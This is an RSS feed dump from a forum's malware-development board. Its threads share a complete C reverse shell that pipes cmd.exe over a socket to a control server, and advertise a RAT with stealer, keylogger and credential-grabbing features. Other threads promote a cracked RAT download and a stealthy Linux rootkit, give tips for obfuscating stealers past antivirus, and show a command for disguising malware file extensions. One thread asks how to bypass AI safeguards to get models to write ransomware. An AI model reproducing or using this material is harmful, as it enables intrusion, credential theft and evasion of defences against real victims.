<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:dc="http://purl.org/dc/elements/1.1/">
	<channel>
		<title><![CDATA[PwnForums - Malware Development]]></title>
		<link>https://pwnforums.st/</link>
		<description><![CDATA[PwnForums - https://pwnforums.st]]></description>
		<pubDate>Tue, 07 Apr 2026 06:46:55 +0000</pubDate>
		<generator>MyBB</generator>
		<item>
			<title><![CDATA[Malware On Steroids]]></title>
			<link>https://pwnforums.st/Thread-Malware-On-Steroids--187562</link>
			<pubDate>Tue, 10 Feb 2026 19:06:22 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://pwnforums.st/member.php?action=profile&uid=711528">Carpenter12</a>]]></dc:creator>
			<guid isPermaLink="false">https://pwnforums.st/Thread-Malware-On-Steroids--187562</guid>
			<description><![CDATA[panel of victims : <a href="https://t.me/paneltxt" target="_blank" rel="noopener" class="mycode_url">https://t.me/paneltxt</a><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
null<br />
<br />
<br />
null]]></description>
			<content:encoded><![CDATA[panel of victims : <a href="https://t.me/paneltxt" target="_blank" rel="noopener" class="mycode_url">https://t.me/paneltxt</a><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
null<br />
<br />
<br />
null]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[PE Loader]]></title>
			<link>https://pwnforums.st/Thread-PE-Loader</link>
			<pubDate>Mon, 09 Feb 2026 08:46:21 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://pwnforums.st/member.php?action=profile&uid=153642">arsium</a>]]></dc:creator>
			<guid isPermaLink="false">https://pwnforums.st/Thread-PE-Loader</guid>
			<description><![CDATA[Currently working on PE file format and loader.<br />
<br />
Enjoy this modern loader ! Will be improved later to be evasive.<br />
<br />
Source :<br />
<a href="https://github.com/arsium/Manual-PE-Loader" target="_blank" rel="noopener" class="mycode_url">Manual PE Loader<br />
<br />
<img src="https://external-content.duckduckgo.com/iu/?u=https%3A%2F%2Fraw.githubusercontent.com%2Farsium%2FManual-PE-Loader%2Fmain%2FLoader.png" loading="lazy"  alt="[Image: Loader.png]" class="mycode_img" /></a>]]></description>
			<content:encoded><![CDATA[Currently working on PE file format and loader.<br />
<br />
Enjoy this modern loader ! Will be improved later to be evasive.<br />
<br />
Source :<br />
<a href="https://github.com/arsium/Manual-PE-Loader" target="_blank" rel="noopener" class="mycode_url">Manual PE Loader<br />
<br />
<img src="https://external-content.duckduckgo.com/iu/?u=https%3A%2F%2Fraw.githubusercontent.com%2Farsium%2FManual-PE-Loader%2Fmain%2FLoader.png" loading="lazy"  alt="[Image: Loader.png]" class="mycode_img" /></a>]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Best tech for evasion]]></title>
			<link>https://pwnforums.st/Thread-Best-tech-for-evasion</link>
			<pubDate>Sun, 08 Feb 2026 19:33:24 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://pwnforums.st/member.php?action=profile&uid=703197">jmpqwordptr</a>]]></dc:creator>
			<guid isPermaLink="false">https://pwnforums.st/Thread-Best-tech-for-evasion</guid>
			<description><![CDATA[wassup everyone, I was just wondering, what is the best technique in terms of evasion, specifically for DLL based injections.]]></description>
			<content:encoded><![CDATA[wassup everyone, I was just wondering, what is the best technique in terms of evasion, specifically for DLL based injections.]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Reverse Shell Native]]></title>
			<link>https://pwnforums.st/Thread-Reverse-Shell-Native</link>
			<pubDate>Thu, 05 Feb 2026 08:09:20 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://pwnforums.st/member.php?action=profile&uid=153642">arsium</a>]]></dc:creator>
			<guid isPermaLink="false">https://pwnforums.st/Thread-Reverse-Shell-Native</guid>
			<description><![CDATA[Reverse Shell Native + Bin (Win/Linux) x64<br />
<br />
The goal was to reproduce a reverse shell with only native (NT function). No CRT, No IAT, No Winsock. The server is in C#, cross-platform enable. And reverse shell is pure C for Windows (x64) and able to reconnect if losing connection to server. It works as expected and is currently a POC. It is also possible to add evasion for syscalls and obfuscation.<br />
<br />
Socket<br />
<br />
The first thing to get away was Winsock API. And I find amazing articles combining last research about socket with the most low-level control possible.  <a href="https://leftarcode.com/posts/afd-reverse-engineering-part1/" target="_blank" rel="noopener" class="mycode_url">Under the Hood of AFD.sys Part 1: Investigating Undocumented Interfaces</a> and <a href="https://leftarcode.com/posts/afd-reverse-engineering-part2/" target="_blank" rel="noopener" class="mycode_url">Under the Hood of AFD.sys Part 2: TCP <br />
handshake</a>. We only need here to create a socket, bind it and connect it. Not sending or receiving data since we're gonna associate stds to socket handle.<br />
<br />
Sub-process<br />
<br />
The most complicated part here. It consists of creating a process using NtCreateUserProcess while redirecting std in/out/err. With a bit reversing of base code the CreateProcessA Simple Reverse Shell in C:<br />
<br />
<blockquote class="mycode_quote"><cite>Quote:</cite>#define WIN32_LEAN_AND_MEAN<br />
#define _CRT_SECURE_NO_WARNINGS<br />
#define _WINSOCK_DEPRECATED_NO_WARNINGS<br />
#include &lt;windows.h&gt;<br />
#include &lt;winsock2.h&gt;<br />
#include &lt;ws2tcpip.h&gt;<br />
#include &lt;stdio.h&gt;<br />
// Need to link with Ws2_32.lib<br />
#pragma comment(lib, "ws2_32.lib")<br />
WSADATA wsaData;<br />
SOCKET winSock;<br />
struct sockaddr_in sockAddr;<br />
int port = 8081;<br />
char* ip = "127.0.0.1";<br />
STARTUPINFO sinfo;<br />
PROCESS_INFORMATION pinfo;<br />
int main(int argc, char* argv[]) {<br />
    int start = WSAStartup(MAKEWORD(2, 2), &amp;wsaData);<br />
    winSock = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);<br />
    sockAddr.sin_family = AF_INET;<br />
    sockAddr.sin_port = htons(port);<br />
    sockAddr.sin_addr.s_addr = inet_addr(ip);<br />
    WSAConnect(winSock, (SOCKADDR*)&amp;sockAddr, sizeof(sockAddr), NULL, NULL, NULL, NULL);<br />
    memset(&amp;sinfo, 0, sizeof(sinfo));<br />
    sinfo.cb = sizeof(sinfo);<br />
    sinfo.dwFlags = STARTF_USESTDHANDLES;<br />
    sinfo.hStdError = (HANDLE)winSock;<br />
    sinfo.hStdInput = (HANDLE)winSock;<br />
    sinfo.hStdOutput = (HANDLE)winSock;<br />
    //LoadLibraryA("DllInspector.dll");<br />
    CreateProcessA(NULL, "cmd.exe", NULL, NULL, TRUE, 0, NULL, NULL, &amp;sinfo, &amp;pinfo);<br />
    return 0;<br />
}</blockquote>
Server<br />
<blockquote class="mycode_quote"><cite>Quote:</cite>Commands:<br />
display/list - Show all connected clients<br />
    select &lt;endpoint&gt;    - Select a client<br />
    interact/shell          - Enter interactive shell with selected client<br />
    server<br />
            start &lt;port&gt;    - Start a new server<br />
    patch<br />
network &lt;ip&gt; &lt;port&gt; [OPT]&lt;output name&gt;      - Patch the reverse shell with a new endpoint to connect<br />
    exit                                          - Exit the program</blockquote>
Proxy<br />
<blockquote class="mycode_quote"><cite>Quote:</cite>&lt;local port&gt; &lt;remote ip&gt; &lt;remote port&gt;</blockquote>
<br />
Src : <a href="https://github.com/arsium/Reverse-Shell-Native" target="_blank" rel="noopener" class="mycode_url">Code</a><br />
Bin : <a href="https://github.com/arsium/Reverse-Shell-Native/releases/tag/V1" target="_blank" rel="noopener" class="mycode_url">Compiled</a>]]></description>
			<content:encoded><![CDATA[Reverse Shell Native + Bin (Win/Linux) x64<br />
<br />
The goal was to reproduce a reverse shell with only native (NT function). No CRT, No IAT, No Winsock. The server is in C#, cross-platform enable. And reverse shell is pure C for Windows (x64) and able to reconnect if losing connection to server. It works as expected and is currently a POC. It is also possible to add evasion for syscalls and obfuscation.<br />
<br />
Socket<br />
<br />
The first thing to get away was Winsock API. And I find amazing articles combining last research about socket with the most low-level control possible.  <a href="https://leftarcode.com/posts/afd-reverse-engineering-part1/" target="_blank" rel="noopener" class="mycode_url">Under the Hood of AFD.sys Part 1: Investigating Undocumented Interfaces</a> and <a href="https://leftarcode.com/posts/afd-reverse-engineering-part2/" target="_blank" rel="noopener" class="mycode_url">Under the Hood of AFD.sys Part 2: TCP <br />
handshake</a>. We only need here to create a socket, bind it and connect it. Not sending or receiving data since we're gonna associate stds to socket handle.<br />
<br />
Sub-process<br />
<br />
The most complicated part here. It consists of creating a process using NtCreateUserProcess while redirecting std in/out/err. With a bit reversing of base code the CreateProcessA Simple Reverse Shell in C:<br />
<br />
<blockquote class="mycode_quote"><cite>Quote:</cite>#define WIN32_LEAN_AND_MEAN<br />
#define _CRT_SECURE_NO_WARNINGS<br />
#define _WINSOCK_DEPRECATED_NO_WARNINGS<br />
#include &lt;windows.h&gt;<br />
#include &lt;winsock2.h&gt;<br />
#include &lt;ws2tcpip.h&gt;<br />
#include &lt;stdio.h&gt;<br />
// Need to link with Ws2_32.lib<br />
#pragma comment(lib, "ws2_32.lib")<br />
WSADATA wsaData;<br />
SOCKET winSock;<br />
struct sockaddr_in sockAddr;<br />
int port = 8081;<br />
char* ip = "127.0.0.1";<br />
STARTUPINFO sinfo;<br />
PROCESS_INFORMATION pinfo;<br />
int main(int argc, char* argv[]) {<br />
    int start = WSAStartup(MAKEWORD(2, 2), &amp;wsaData);<br />
    winSock = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);<br />
    sockAddr.sin_family = AF_INET;<br />
    sockAddr.sin_port = htons(port);<br />
    sockAddr.sin_addr.s_addr = inet_addr(ip);<br />
    WSAConnect(winSock, (SOCKADDR*)&amp;sockAddr, sizeof(sockAddr), NULL, NULL, NULL, NULL);<br />
    memset(&amp;sinfo, 0, sizeof(sinfo));<br />
    sinfo.cb = sizeof(sinfo);<br />
    sinfo.dwFlags = STARTF_USESTDHANDLES;<br />
    sinfo.hStdError = (HANDLE)winSock;<br />
    sinfo.hStdInput = (HANDLE)winSock;<br />
    sinfo.hStdOutput = (HANDLE)winSock;<br />
    //LoadLibraryA("DllInspector.dll");<br />
    CreateProcessA(NULL, "cmd.exe", NULL, NULL, TRUE, 0, NULL, NULL, &amp;sinfo, &amp;pinfo);<br />
    return 0;<br />
}</blockquote>
Server<br />
<blockquote class="mycode_quote"><cite>Quote:</cite>Commands:<br />
display/list - Show all connected clients<br />
    select &lt;endpoint&gt;    - Select a client<br />
    interact/shell          - Enter interactive shell with selected client<br />
    server<br />
            start &lt;port&gt;    - Start a new server<br />
    patch<br />
network &lt;ip&gt; &lt;port&gt; [OPT]&lt;output name&gt;      - Patch the reverse shell with a new endpoint to connect<br />
    exit                                          - Exit the program</blockquote>
Proxy<br />
<blockquote class="mycode_quote"><cite>Quote:</cite>&lt;local port&gt; &lt;remote ip&gt; &lt;remote port&gt;</blockquote>
<br />
Src : <a href="https://github.com/arsium/Reverse-Shell-Native" target="_blank" rel="noopener" class="mycode_url">Code</a><br />
Bin : <a href="https://github.com/arsium/Reverse-Shell-Native/releases/tag/V1" target="_blank" rel="noopener" class="mycode_url">Compiled</a>]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Malware FUD easy]]></title>
			<link>https://pwnforums.st/Thread-Malware-FUD-easy</link>
			<pubDate>Tue, 03 Feb 2026 20:06:22 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://pwnforums.st/member.php?action=profile&uid=707619">Cvld</a>]]></dc:creator>
			<guid isPermaLink="false">https://pwnforums.st/Thread-Malware-FUD-easy</guid>
			<description><![CDATA[<div style="text-align: left;" class="mycode_align">Hello Dear bf community i found 2 exploit (if we can call that)<br />
u can create Any Stealer or Malware with Bun or Node JS and compile it with electron or Bun,<br />
if u compile in electron u need to obf with <a href="https://js-confuser.com/" target="_blank" rel="noopener" class="mycode_url">https://js-confuser.com/</a> and <a href="https://obfuscator.io/" target="_blank" rel="noopener" class="mycode_url">https://obfuscator.io/</a>, build time is 10 MIN and execution was very slow, but generaly 2-3/72 detection on Virustotal,<br />
ps : use <a href="https://tria.ge/" target="_blank" rel="noopener" class="mycode_url">https://tria.ge/</a> for analyse in debug ur malware</div>]]></description>
			<content:encoded><![CDATA[<div style="text-align: left;" class="mycode_align">Hello Dear bf community i found 2 exploit (if we can call that)<br />
u can create Any Stealer or Malware with Bun or Node JS and compile it with electron or Bun,<br />
if u compile in electron u need to obf with <a href="https://js-confuser.com/" target="_blank" rel="noopener" class="mycode_url">https://js-confuser.com/</a> and <a href="https://obfuscator.io/" target="_blank" rel="noopener" class="mycode_url">https://obfuscator.io/</a>, build time is 10 MIN and execution was very slow, but generaly 2-3/72 detection on Virustotal,<br />
ps : use <a href="https://tria.ge/" target="_blank" rel="noopener" class="mycode_url">https://tria.ge/</a> for analyse in debug ur malware</div>]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Steaelite RAT v2 - Best Windows RAT | Fully Undetectable | FUD Remote Access Tool]]></title>
			<link>https://pwnforums.st/Thread-Steaelite-RAT-v2-Best-Windows-RAT-Fully-Undetectable-FUD-Remote-Access-Tool</link>
			<pubDate>Tue, 27 Jan 2026 06:49:48 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://pwnforums.st/member.php?action=profile&uid=706154">STEADEV</a>]]></dc:creator>
			<guid isPermaLink="false">https://pwnforums.st/Thread-Steaelite-RAT-v2-Best-Windows-RAT-Fully-Undetectable-FUD-Remote-Access-Tool</guid>
			<description><![CDATA[✨ <span style="font-weight: bold;" class="mycode_b">Steaelite RAT v2</span>: Limitless Control and Monitoring<br />
<br />
<br />
⭐️ <span style="font-weight: bold;" class="mycode_b">Essential Capabilities</span>:<br />
<br />
? Reconnect: Automatically restore connections if access is lost.<br />
? Streamlined Access: Enable Fast Access Buttons for instant control.<br />
? Lightweight: Small, standalone executable with no dependencies.<br />
? Wide Compatibility: Works on Windows 7 to 11 (both x86 and x64).<br />
? Stealthy Operation: Auto Startup, Anti-double-launch, Anti-VM, Anti-debug.<br />
? Automated Functions: Auto Stealer, Keylogger, Command Execution on first run.<br />
<br />
<br />
⭐️ <span style="font-weight: bold;" class="mycode_b">Advanced Options:</span><br />
<br />
? Data Recovery &amp; Grab: Browser Autofills, Desktop Wallets, Discord &amp; Telegram data.<br />
? Browser Control: Downloads, Cookies, Passwords, Credit Cards, History with decryption.<br />
? Media &amp; System Control: Webcamera Capture, Display Rotation, Wallpaper changing.<br />
? File Management: Encrypt/Decrypt, Copy, Delete, Download, Upload, List files.<br />
? Process Control: Run, List, Kill, Get Path, Manage Battery, Installed Software.<br />
? System Actions: Shutdown, Restart, Logoff, Blue Screen of Death, Bot Gifting.<br />
? Network &amp; Security: Proxy Usage, Command Execution, Privilege Elevation.<br />
<br />
Buy Now via Telegram Bot: <a href="https://t.me/steaelitebot" target="_blank" rel="noopener" class="mycode_url">@steaelitebot</a><br />
<br />
Experience unparalleled control and efficiency with Steaelite RAT v2. Acquire your license through our convenient Telegram bot and start utilizing the most advanced remote access capabilities today!]]></description>
			<content:encoded><![CDATA[✨ <span style="font-weight: bold;" class="mycode_b">Steaelite RAT v2</span>: Limitless Control and Monitoring<br />
<br />
<br />
⭐️ <span style="font-weight: bold;" class="mycode_b">Essential Capabilities</span>:<br />
<br />
? Reconnect: Automatically restore connections if access is lost.<br />
? Streamlined Access: Enable Fast Access Buttons for instant control.<br />
? Lightweight: Small, standalone executable with no dependencies.<br />
? Wide Compatibility: Works on Windows 7 to 11 (both x86 and x64).<br />
? Stealthy Operation: Auto Startup, Anti-double-launch, Anti-VM, Anti-debug.<br />
? Automated Functions: Auto Stealer, Keylogger, Command Execution on first run.<br />
<br />
<br />
⭐️ <span style="font-weight: bold;" class="mycode_b">Advanced Options:</span><br />
<br />
? Data Recovery &amp; Grab: Browser Autofills, Desktop Wallets, Discord &amp; Telegram data.<br />
? Browser Control: Downloads, Cookies, Passwords, Credit Cards, History with decryption.<br />
? Media &amp; System Control: Webcamera Capture, Display Rotation, Wallpaper changing.<br />
? File Management: Encrypt/Decrypt, Copy, Delete, Download, Upload, List files.<br />
? Process Control: Run, List, Kill, Get Path, Manage Battery, Installed Software.<br />
? System Actions: Shutdown, Restart, Logoff, Blue Screen of Death, Bot Gifting.<br />
? Network &amp; Security: Proxy Usage, Command Execution, Privilege Elevation.<br />
<br />
Buy Now via Telegram Bot: <a href="https://t.me/steaelitebot" target="_blank" rel="noopener" class="mycode_url">@steaelitebot</a><br />
<br />
Experience unparalleled control and efficiency with Steaelite RAT v2. Acquire your license through our convenient Telegram bot and start utilizing the most advanced remote access capabilities today!]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Stealthy open-source linux rootkit]]></title>
			<link>https://pwnforums.st/Thread-Stealthy-open-source-linux-rootkit</link>
			<pubDate>Fri, 23 Jan 2026 10:36:12 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://pwnforums.st/member.php?action=profile&uid=704064">netexec</a>]]></dc:creator>
			<guid isPermaLink="false">https://pwnforums.st/Thread-Stealthy-open-source-linux-rootkit</guid>
			<description><![CDATA[One of the best rootkits currently, hides very well for strong persistence.<br />
<br />
<blockquote class="mycode_quote"><cite>Quote:</cite>Singularity is a sophisticated rootkit that operates at the kernel level, providing:<ul class="mycode_list"><li><span style="font-weight: bold;" class="mycode_b">Process Hiding</span>: Make any process completely invisible to the system<br />
</li>
<li><span style="font-weight: bold;" class="mycode_b">File &amp; Directory Hiding</span>: Conceal files using pattern matching<br />
</li>
<li><span style="font-weight: bold;" class="mycode_b">Network Stealth</span>: Hide TCP/UDP connections, ports, and conntrack entries<br />
</li>
<li><span style="font-weight: bold;" class="mycode_b">Privilege Escalation</span>: Signal-based instant root access<br />
</li>
<li><span style="font-weight: bold;" class="mycode_b">Log Sanitization</span>: Filter kernel logs and system journals in real-time<br />
</li>
<li><span style="font-weight: bold;" class="mycode_b">Self-Hiding</span>: Remove itself from module lists and system monitoring<br />
</li>
<li><span style="font-weight: bold;" class="mycode_b">Remote Access</span>: ICMP-triggered reverse shell with automatic hiding<br />
</li>
<li><span style="font-weight: bold;" class="mycode_b">Anti-Detection</span>: Evade eBPF-based runtime security tools (Falco, Tracee), bypass Linux Kernel Runtime Guard (LKRG), and prevent io_uring bypass attempts<br />
</li>
<li><span style="font-weight: bold;" class="mycode_b">Audit Evasion</span>: Drop audit messages for hidden processes at netlink level with statistics tracking and socket inode filtering<br />
</li>
<li><span style="font-weight: bold;" class="mycode_b">Memory Forensics Evasion</span>: Filter /proc/kcore, /proc/kallsyms, /proc/vmallocinfo<br />
</li>
<li><span style="font-weight: bold;" class="mycode_b">Cgroup Filtering</span>: Filter hidden PIDs from cgroup.procs<br />
</li>
<li><span style="font-weight: bold;" class="mycode_b">Syslog Evasion</span>: Hook do_syslog to filter klogctl() kernel ring buffer access<br />
</li>
<li><span style="font-weight: bold;" class="mycode_b">Debugfs Evasion</span>: Filter output of tools like debugfs that read raw block devices<br />
</li>
<li><span style="font-weight: bold;" class="mycode_b">Conntrack Filtering</span>: Hide connections from /proc/net/nf_conntrack and netlink SOCK_DIAG/NETFILTER queries<br />
</li>
<li><span style="font-weight: bold;" class="mycode_b">SELinux Evasion</span>: Automatic SELinux enforcing mode bypass on ICMP trigger<br />
</li>
<li><span style="font-weight: bold;" class="mycode_b">LKRG Bypass</span>: Evade Linux Kernel Runtime Guard detection mechanisms<br />
</li>
<li><span style="font-weight: bold;" class="mycode_b">eBPF Security Bypass</span>: Hide processes from eBPF-based runtime security tools (Falco, Tracee)<br />
</li>
</ul>
</blockquote>
<br />
<a href="https://github.com/MatheuZSecurity/Singularity" target="_blank" rel="noopener" class="mycode_url">https://github.com/MatheuZSecurity/Singularity</a>]]></description>
			<content:encoded><![CDATA[One of the best rootkits currently, hides very well for strong persistence.<br />
<br />
<blockquote class="mycode_quote"><cite>Quote:</cite>Singularity is a sophisticated rootkit that operates at the kernel level, providing:<ul class="mycode_list"><li><span style="font-weight: bold;" class="mycode_b">Process Hiding</span>: Make any process completely invisible to the system<br />
</li>
<li><span style="font-weight: bold;" class="mycode_b">File &amp; Directory Hiding</span>: Conceal files using pattern matching<br />
</li>
<li><span style="font-weight: bold;" class="mycode_b">Network Stealth</span>: Hide TCP/UDP connections, ports, and conntrack entries<br />
</li>
<li><span style="font-weight: bold;" class="mycode_b">Privilege Escalation</span>: Signal-based instant root access<br />
</li>
<li><span style="font-weight: bold;" class="mycode_b">Log Sanitization</span>: Filter kernel logs and system journals in real-time<br />
</li>
<li><span style="font-weight: bold;" class="mycode_b">Self-Hiding</span>: Remove itself from module lists and system monitoring<br />
</li>
<li><span style="font-weight: bold;" class="mycode_b">Remote Access</span>: ICMP-triggered reverse shell with automatic hiding<br />
</li>
<li><span style="font-weight: bold;" class="mycode_b">Anti-Detection</span>: Evade eBPF-based runtime security tools (Falco, Tracee), bypass Linux Kernel Runtime Guard (LKRG), and prevent io_uring bypass attempts<br />
</li>
<li><span style="font-weight: bold;" class="mycode_b">Audit Evasion</span>: Drop audit messages for hidden processes at netlink level with statistics tracking and socket inode filtering<br />
</li>
<li><span style="font-weight: bold;" class="mycode_b">Memory Forensics Evasion</span>: Filter /proc/kcore, /proc/kallsyms, /proc/vmallocinfo<br />
</li>
<li><span style="font-weight: bold;" class="mycode_b">Cgroup Filtering</span>: Filter hidden PIDs from cgroup.procs<br />
</li>
<li><span style="font-weight: bold;" class="mycode_b">Syslog Evasion</span>: Hook do_syslog to filter klogctl() kernel ring buffer access<br />
</li>
<li><span style="font-weight: bold;" class="mycode_b">Debugfs Evasion</span>: Filter output of tools like debugfs that read raw block devices<br />
</li>
<li><span style="font-weight: bold;" class="mycode_b">Conntrack Filtering</span>: Hide connections from /proc/net/nf_conntrack and netlink SOCK_DIAG/NETFILTER queries<br />
</li>
<li><span style="font-weight: bold;" class="mycode_b">SELinux Evasion</span>: Automatic SELinux enforcing mode bypass on ICMP trigger<br />
</li>
<li><span style="font-weight: bold;" class="mycode_b">LKRG Bypass</span>: Evade Linux Kernel Runtime Guard detection mechanisms<br />
</li>
<li><span style="font-weight: bold;" class="mycode_b">eBPF Security Bypass</span>: Hide processes from eBPF-based runtime security tools (Falco, Tracee)<br />
</li>
</ul>
</blockquote>
<br />
<a href="https://github.com/MatheuZSecurity/Singularity" target="_blank" rel="noopener" class="mycode_url">https://github.com/MatheuZSecurity/Singularity</a>]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[AI Agents for Coding Malwares]]></title>
			<link>https://pwnforums.st/Thread-AI-Agents-for-Coding-Malwares</link>
			<pubDate>Wed, 21 Jan 2026 18:27:55 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://pwnforums.st/member.php?action=profile&uid=698051">Grokly</a>]]></dc:creator>
			<guid isPermaLink="false">https://pwnforums.st/Thread-AI-Agents-for-Coding-Malwares</guid>
			<description><![CDATA[I have seen a lot of articles and post on Social Media people are using AI to code malwares like any. RansomWare, Wipers, Stealer , loader etc<br />
<br />
I heard that people used Claude <br />
<br />
is there any techniques to bypass the Restrictions &lt;&gt;???<br />
<br />
does anyone using any AI LLM etc to code malwares ??? <br />
<br />
sharing is caring]]></description>
			<content:encoded><![CDATA[I have seen a lot of articles and post on Social Media people are using AI to code malwares like any. RansomWare, Wipers, Stealer , loader etc<br />
<br />
I heard that people used Claude <br />
<br />
is there any techniques to bypass the Restrictions &lt;&gt;???<br />
<br />
does anyone using any AI LLM etc to code malwares ??? <br />
<br />
sharing is caring]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[[Rust]fun way to execute shellcode]]></title>
			<link>https://pwnforums.st/Thread-Rust-fun-way-to-execute-shellcode</link>
			<pubDate>Mon, 19 Jan 2026 11:40:45 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://pwnforums.st/member.php?action=profile&uid=704082">anfeng10</a>]]></dc:creator>
			<guid isPermaLink="false">https://pwnforums.st/Thread-Rust-fun-way-to-execute-shellcode</guid>
			<description><![CDATA[<div class="hidden-content">
	<div class="hidden-content-title">
		<strong>Hidden Content</strong><br />
	</div>
	<div class="hidden-content-body">
		You must <a href="https://pwnforums.st/member.php?action=register">register</a> or <a href="https://pwnforums.st/member.php?action=login">login</a> to view this content.<br />
	</div>
</div>
<br />
execute shellcode after display turn off]]></description>
			<content:encoded><![CDATA[<div class="hidden-content">
	<div class="hidden-content-title">
		<strong>Hidden Content</strong><br />
	</div>
	<div class="hidden-content-body">
		You must <a href="https://pwnforums.st/member.php?action=register">register</a> or <a href="https://pwnforums.st/member.php?action=login">login</a> to view this content.<br />
	</div>
</div>
<br />
execute shellcode after display turn off]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[XWorm v7.2 Cracked]]></title>
			<link>https://pwnforums.st/Thread-XWorm-v7-2-Cracked</link>
			<pubDate>Sun, 18 Jan 2026 19:34:41 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://pwnforums.st/member.php?action=profile&uid=704345">GreedyRaven</a>]]></dc:creator>
			<guid isPermaLink="false">https://pwnforums.st/Thread-XWorm-v7-2-Cracked</guid>
			<description><![CDATA[XWorm 7.2 <br />
Windows Remote Administartion Tool, Remotely control windows and its lightweight<br />
Features<ul class="mycode_list"><li>Cracked Cleaned file<br />
</li>
<li>All apps included<br />
</li>
<li>Offline activation<br />
</li>
<li>All plugins<br />
</li>
<li>Lightweight installer<br />
</li>
</ul>
<br />
<span style="font-weight: bold;" class="mycode_b"> !!!! Caution !!!!</span><br />
<span style="font-weight: bold;" class="mycode_b">Connects to srv1387.hstgr[.]io when launched. &lt;- LAUNCH ONLY IN VM AND BE SURE C2 IS DEAD, PROB RATTED BY ORIGINAL CRACKER</span><br />
<br />
Credit: Drcrypt0r<br />
<br />
<a href="https://github.com/Cryakl/Ultimate-RAT-Collection/raw/refs/heads/main/XWorm/XWorm%20V7.2/XWorm%20V7.2.7z.003" target="_blank" rel="noopener" class="mycode_url">https://github.com/Cryakl/Ultimate-RAT-C...7.2.7z.003</a>]]></description>
			<content:encoded><![CDATA[XWorm 7.2 <br />
Windows Remote Administartion Tool, Remotely control windows and its lightweight<br />
Features<ul class="mycode_list"><li>Cracked Cleaned file<br />
</li>
<li>All apps included<br />
</li>
<li>Offline activation<br />
</li>
<li>All plugins<br />
</li>
<li>Lightweight installer<br />
</li>
</ul>
<br />
<span style="font-weight: bold;" class="mycode_b"> !!!! Caution !!!!</span><br />
<span style="font-weight: bold;" class="mycode_b">Connects to srv1387.hstgr[.]io when launched. &lt;- LAUNCH ONLY IN VM AND BE SURE C2 IS DEAD, PROB RATTED BY ORIGINAL CRACKER</span><br />
<br />
Credit: Drcrypt0r<br />
<br />
<a href="https://github.com/Cryakl/Ultimate-RAT-Collection/raw/refs/heads/main/XWorm/XWorm%20V7.2/XWorm%20V7.2.7z.003" target="_blank" rel="noopener" class="mycode_url">https://github.com/Cryakl/Ultimate-RAT-C...7.2.7z.003</a>]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Malware Extension Spoofer]]></title>
			<link>https://pwnforums.st/Thread-Malware-Extension-Spoofer</link>
			<pubDate>Tue, 13 Jan 2026 00:16:39 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://pwnforums.st/member.php?action=profile&uid=385530">Psych1c</a>]]></dc:creator>
			<guid isPermaLink="false">https://pwnforums.st/Thread-Malware-Extension-Spoofer</guid>
			<description><![CDATA[<div style="text-align: center;" class="mycode_align">PowerShell script that hides the app/malware file extension by padding the filename with spaces.</div>
<div style="text-align: center;" class="mycode_align">This method has been covered by John Hammond on his channel and this is simply a slightly improved remake of his code</div>
<div style="text-align: center;" class="mycode_align">‎ </div>
<div style="text-align: center;" class="mycode_align"><span style="color: #ffffff;" class="mycode_color">Example picture: </span></div>
<div style="text-align: center;" class="mycode_align"><img src="https://external-content.duckduckgo.com/iu/?u=https%3A%2F%2Fi.ibb.co%2FXfqqTTYm%2FScreenshot-2026-01-12-162542.png" loading="lazy"  alt="[Image: Screenshot-2026-01-12-162542.png]" class="mycode_img" /></div>
<div style="text-align: center;" class="mycode_align">‎ ‎ </div>
<div style="text-align: center;" class="mycode_align"><span style="color: #ffffff;" class="mycode_color">Example video:</span></div>
<div style="text-align: center;" class="mycode_align"><a href="https://sendvid.com/ml86udlc" target="_blank" rel="noopener" class="mycode_url">https://sendvid.com/ml86udlc</a></div>
<div style="text-align: center;" class="mycode_align">‎ </div>
<div style="text-align: center;" class="mycode_align"><span style="color: #ffffff;" class="mycode_color">Use command:</span></div>
<div style="text-align: center;" class="mycode_align"><div class="codeblock"><div class="body" dir="ltr"><code>.&#92;extspooferps.ps1 -FilePath .&#92;malware.exe -NewBasename "innocentfile.jpg" -NewExtension "exe"</code></div></div></div>
<div style="text-align: center;" class="mycode_align">‎ ‎ </div>
<div style="text-align: center;" class="mycode_align"><span style="color: #ffffff;" class="mycode_color">Script:</span></div>
<div style="text-align: center;" class="mycode_align"><div class="hidden-content">
	<div class="hidden-content-title">
		<strong>Hidden Content</strong><br />
	</div>
	<div class="hidden-content-body">
		You must <a href="https://pwnforums.st/member.php?action=register">register</a> or <a href="https://pwnforums.st/member.php?action=login">login</a> to view this content.<br />
	</div>
</div></div>]]></description>
			<content:encoded><![CDATA[<div style="text-align: center;" class="mycode_align">PowerShell script that hides the app/malware file extension by padding the filename with spaces.</div>
<div style="text-align: center;" class="mycode_align">This method has been covered by John Hammond on his channel and this is simply a slightly improved remake of his code</div>
<div style="text-align: center;" class="mycode_align">‎ </div>
<div style="text-align: center;" class="mycode_align"><span style="color: #ffffff;" class="mycode_color">Example picture: </span></div>
